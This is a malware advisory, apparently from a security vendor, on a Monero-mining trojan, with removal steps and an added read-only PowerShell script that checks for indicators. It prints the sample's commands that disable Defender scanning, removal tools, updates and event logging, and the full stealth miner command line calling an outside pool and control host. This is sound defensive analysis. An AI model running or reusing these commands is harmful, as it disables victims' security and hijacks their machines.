Trojan.Win64.MALXMR.CJDR
Windows

Malware type:
Trojan
Destructive?:
No
Encrypted?:
In the Wild:
Yes
Overview
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
It adds services that resemble legitimate applications so that users mistake them for legitimate ones.
It connects to a website to send and receive information.
Technical Details
Arrival Details
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Installation
It drops a copy of itself, under a different file name, in the following folder:
- %ProgramData%\Google\Chrome\updater.exe
It adds the following processes:
- powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force → adds the user profile and program data directories to the exclusion list for Windows Defender to bypass scanning specific folders and .exe files.
- cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart → quietly uninstalls the Microsoft Malicious Software Removal Tool (KB890830) without restarting the computer.
- sc.exe stop UsoSvc → stops the Update Orchestrator Service, which manages Windows Updates
- sc.exe stop WaaSMedicSvc → stops the Windows Update Medic Service, which ensures the proper functioning of Windows Update components
- sc.exe stop wuauserv → stops the Windows Update service to halt automatic updates
- sc.exe stop bits → stops the Background Intelligent Transfer Service, used by Windows Update for downloading updates
- sc.exe stop dosvc → stops the Delivery Optimization service, which handles peer-to-peer update sharing
- powercfg.exe /x -hibernate-timeout-ac 0 → disables the hibernate timeout for computers on AC power
- powercfg.exe /x -hibernate-timeout-dc 0 → disables the hibernate timeout for computers on battery power
- powercfg.exe /x -standby-timeout-ac 0 → disables the standby timeout for computers on AC power
- powercfg.exe /x -standby-timeout-dc 0 → disables the standby timeout for computers on battery power
- sc.exe delete "GoogleUpdateTaskMachineQC" → deletes any existing service named "GoogleUpdateTaskMachineQC"
- sc.exe create "GoogleUpdateTaskMachineQC" binpath= "%ProgramData%\Google\Chrome\updater.exe" start= "auto" → creates a new auto-start service that points to the dropped copy of itself
- sc.exe stop eventlog → stops the Windows Event Log service
- sc.exe start "GoogleUpdateTaskMachineQC" → starts the newly created service
- explorer.exe --algo=rx/0 --url=xmr.2miners.com:12222 --user=86EBNigoaCXSio7ySVmzWpQKwD6L2LAsFFhfZEFbqiivD4n2BdrXF4XKcXAFHLS7hsRcYW3WXpQZqgkWuFR66QeqMx3AV4S --pass=x --cpu-max-threads-hint=20 --cinit-winring=mhhvoejiojwd.sys --cinit-stealth-targets=Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,PLlhDBWxRt.exe,GPU-Z.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Falluot4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe --cinit-api=http://cdnupdateservice.com/api/endpoint.php --cinit-version=3.4.0 --tls --cinit-idle-wait=5 --cinit-idle-cpu=90 --cinit-id=tjnooobwkhcgvgyn → runs a hidden Monero mining process disguised as a legitimate process and using stealth parameters to avoid detection by various applications
It adds the following service, which resembles a legitimate application so that users mistake it for a legitimate one:
- Service Name: GoogleUpdateTaskMachineQC
  Type: Own process
  Binary Path: %ProgramData%\Google\Chrome\updater.exe
  Start type: Auto start
Other System Modifications
It adds the following registry entry:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT
DontOfferThroughWUAU = 1 → disables offering the Microsoft Malicious Software Removal Tool through Windows Update
It modifies the following registry keys:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuauserv
Renamed to wuauserv_bkp → causes the Windows Update service to stop working
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BITS
Renamed to BITS_bkp → causes the Background Intelligent Transfer Service to stop working
Other Details
It adds the following registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT
It connects to the following websites to send and receive information:
- http://{BLOCKED}.{BLOCKED}.{BLOCKED}.251
  which redirects to: http://{BLOCKED}ateservice.com/api/endpoint.php
- {BLOCKED}.{BLOCKED}.{BLOCKED}.184:1222
  which redirects to: {BLOCKED}ners.com:12222
  which redirects again to: {BLOCKED}ners.com:12222 → mining pool
- {BLOCKED}ners.com:12222
It does the following:
- It uses binary padding to increase its own file size and evade detection.
- It uses up to 20 CPU threads for mining, potentially slowing down the system.
- It injects its mining process into explorer.exe and hides itself from the following applications:
  - GPU-Z.exe
  - perfmon.exe
  - ProcessHacker.exe
  - procexp.exe
  - procexp64.exe
  - Taskmgr.exe
  - arma3_x64.exe
  - arma3.exe
  - bf4.exe
  - BlackOpsColdWar.exe
  - Borderlands2.exe
  - Borderlands3.exe
  - CK2game.exe
  - ck3.exe
  - csgo.exe
  - Cyberpunk2077.exe
  - DeadByDaylight-Win64-Shipping.exe
  - EliteDangerous64.exe
  - enlisted.exe
  - EscapeFromTarkov.exe
  - FactoryGame.exe
  - Falluot4.exe
  - FarCry5.exe
  - ffxiv_dx11.exe
  - ffxiv.exe
  - FIFA21.exe
  - FiveM_b2189_GTAProcess.exe
  - FiveM_GTAProcess.exe
  - FiveM.exe
  - FortniteClient-Win64-Shipping.exe
  - ForzaHorizon4.exe
  - GenshinImpact.exe
  - GTA5.exe
  - iw6sp64_ship.exe
  - League of Legends.exe
  - LeagueClientUx.exe
  - left4dead2.exe
  - Little_Nightmares_II_Enhanced-Win64-Shipping.exe
  - ModernWarfare.exe
  - NarakaBladepoint.exe
  - NBA2K21.exe
  - NBA2K22.exe
  - NMS.exe
  - Phasmophobia.exe
  - PlanetCoaster.exe
  - PointBlank.exe
  - PortalWars-Win64-Shipping.exe
  - r5apex.exe
  - RainbowSix_BE.exe
  - RainbowSix.exe
  - RDR2.exe
  - re8.exe
  - RocketLeague.exe
  - RogueCompany.exe
  - RustClient.exe
  - ShooterGame_BE.exe
  - ShooterGame.exe
  - ShooterGameServer.exe
  - SoTGame.exe
  - SRTTR.exe
  - stellaris.exe
  - TEKKEN7.exe
  - Tiger-Win64-Shipping.exe
  - TslGame.exe
  - VALORANT.exe
  - VRChat.exe
  - Warframe.x64.exe
  - WatchDogsLegion.exe
  - WorldOfTanks.exe
  - zula.exe
  - acad.exe
  - Adobe Premiere Pro.exe
  - AfterFX.exe
  - Photoshop.exe
  - VideoEditorPlus.exe
  - AndroidEmulatorEn.exe
  - PLlhDBWxRt.exe
- It throttles CPU usage down to 90% if the system is idle.
- It uses the following version of the XMR mining application:
  - 3.4.0
- It mines the following cryptocurrency coin:
  - Monero (XMR)
Solution
Step 1
For Windows ME and XP users, before doing any scans, please make sure you disable System Restore to allow full scanning of your computer.
Step 2
Note: Not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.
Step 3
Restart in Safe Mode and delete this registry key
Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how, or with the assistance of your system administrator. Otherwise, read the Microsoft article first before modifying your computer's registry.
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\
  - GoogleUpdateTaskMachineQC
Step 4
Delete this registry value
Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how, or with the assistance of your system administrator. Otherwise, read the Microsoft article first before modifying your computer's registry.
- In HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT
  - DontOfferThroughWUAU = 1
Step 5
Delete this registry key
Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how, or with the assistance of your system administrator. Otherwise, read the Microsoft article first before modifying your computer's registry.
- In HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\
  - MRT
Step 6
Search and delete this file
- %ProgramData%\Google\Chrome\updater.exe
Step 7
Restart in normal mode and scan your computer with your AsiaInfo Security product for files detected as Trojan.Win64.MALXMR.CJDR. If the detected files have already been cleaned, deleted, or quarantined by your AsiaInfo Security product, no further step is required. You may opt to simply delete the quarantined files. Please check the Knowledge Base page for more information.
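The following PowerShell check, added here as an example and not part of the vendor's write-up, reports the host-side indicators described above (dropped file, look-alike service, MRT policy value, renamed Windows Update/BITS keys, stopped services and Defender exclusions) so an administrator can confirm the state of a machine before and after the removal steps. It assumes an elevated session on Windows with the Defender module (Get-MpPreference) available; it only reports and changes nothing.

```powershell
# Added example: report indicators of Trojan.Win64.MALXMR.CJDR on the local host.
# Assumes an elevated PowerShell session; Get-MpPreference requires the Defender module.
function Test-MalxmrCjdrIndicators {
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. Dropped copy and the look-alike service that points at it
    $dropped = Join-Path $env:ProgramData 'Google\Chrome\updater.exe'
    if (Test-Path -LiteralPath $dropped) { $findings.Add("Dropped file present: $dropped") }
    $svc = Get-CimInstance Win32_Service -Filter "Name='GoogleUpdateTaskMachineQC'"
    if ($svc) { $findings.Add("Service GoogleUpdateTaskMachineQC -> $($svc.PathName) [$($svc.State)]") }

    # 2. Policy value that suppresses Malicious Software Removal Tool updates
    $mrt = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\MRT' `
                            -Name 'DontOfferThroughWUAU' -ErrorAction SilentlyContinue
    if ($mrt -and $mrt.DontOfferThroughWUAU -eq 1) { $findings.Add('MRT\DontOfferThroughWUAU = 1') }

    # 3. Windows Update and BITS service keys renamed with a _bkp suffix
    foreach ($name in 'wuauserv_bkp', 'BITS_bkp') {
        if (Test-Path "HKLM:\SYSTEM\CurrentControlSet\Services\$name") {
            $findings.Add("Renamed service key present: $name")
        }
    }

    # 4. Update, delivery-optimisation and event-log services the sample stops
    foreach ($name in 'wuauserv', 'bits', 'UsoSvc', 'WaaSMedicSvc', 'dosvc', 'EventLog') {
        $s = Get-Service -Name $name -ErrorAction SilentlyContinue
        if ($s -and $s.Status -ne 'Running') { $findings.Add("Service $name is $($s.Status)") }
    }

    # 5. Defender exclusions for the user profile, ProgramData and the .exe extension
    $pref = Get-MpPreference -ErrorAction SilentlyContinue
    if ($pref) {
        foreach ($p in @($env:UserProfile, $env:ProgramData)) {
            if ($pref.ExclusionPath -contains $p) { $findings.Add("Defender path exclusion: $p") }
        }
        if ($pref.ExclusionExtension -contains '.exe') { $findings.Add('Defender extension exclusion: .exe') }
    }
    return $findings
}

$hits = Test-MalxmrCjdrIndicators
if ($hits.Count -eq 0) { 'No indicators found.' } else { $hits }
```

A stopped service or an exclusion on its own is not proof of infection; treat the report as a checklist against the steps above, and note that the renamed wuauserv_bkp/BITS_bkp keys must be restored or Windows Update stays broken after the file and service are removed.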